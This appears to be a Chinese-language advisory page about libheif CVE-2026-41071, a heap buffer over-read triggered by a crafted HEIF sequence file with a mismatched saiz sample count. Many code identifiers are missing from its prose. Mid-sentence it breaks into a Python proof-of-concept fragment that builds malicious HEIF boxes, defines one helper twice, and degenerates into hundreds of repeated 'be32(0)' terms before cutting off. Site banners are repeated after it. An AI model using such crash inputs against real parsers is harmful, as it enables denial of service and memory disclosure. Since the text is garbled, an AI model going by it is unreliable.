libheif CVE-2026-41071 堆缓冲区越界读取漏洞及修复

漏洞概述 标题: Heap buffer over-read in SampleAuxInfoReader via crafted HEIF sequence file with mismatched saiz sample count 描述: 一个精心制作的HEIF序列文件，其中 框声明的样本数多于实际存在于轨道的 chunk 表中的样本数，导致在 构造函数中发生堆缓冲区溢出（越界读取）。 受影响组件: 库: libheif 文件: libheif/sequences/track.cc 函数: 行号: 139-141 根本原因: 构造函数遍历 个样本（第137行），但没有验证此计数是否与 向量中的 chunk 数量一致。当 声明的样本数多于 chunk 数时，循环递增 超过 ，导致越界读取 向量。 具体在第139-141行： 第141行的 在发布构建中被 编译掉，允许越界访问静默发生。 样本计数未与 / 样本计数或实际的 chunk 数进行验证。唯一的检查是在 和 （第324-329行）以及 chunk 计数和 chunk 计数（第437-443行）之间，但 样本计数未与任何这些进行交叉检查。 影响范围 严重性: Moderate CVE ID: CVE-2026-41071 弱点: CWE-125 影响: 堆缓冲区溢出（信息泄露潜在性和拒绝服务（崩溃））。 漏洞在文件解析期间触发（ ），无需任何额外用户交互。 任何使用 libheif 打开未受信任的 HEIF 文件的应用程序都受到影响。 受影响版本: I", 8 + len(data)) + t + data def fullbox(t, version, flags, data): return box(t, bytes([version]) + flags.to_bytes(3, "big") + data) def be32(x): return struct.pack(">I", x) def be32(x): return struct.pack(">I", x) def be64(x): return struct.pack(">Q", x) def be16(x): return struct.pack(">H", x) ftyp = box(b"ftyp", b"miso" + be32(0) + b"miso0200") mhdr = fullbox(b"mhdr", 0, 0, be32(0) + be32(0) + be32(1000) + be32(1000) + be32(0x69696969) + be32(0x696969) + b"\x00\x00\x00\x00") tkhd = fullbox(b"tkhd", 0, 0, be32(0) + be32(0) + be32(1) + be32(1) + be32(1000) + be32(1000) + b"\x00\x00" + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be32(0) + be

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

libheif CVE-2026-41071 堆缓冲区越界读取漏洞及修复

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

libheif CVE-2026-41071 堆缓冲区越界读取漏洞及修复

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！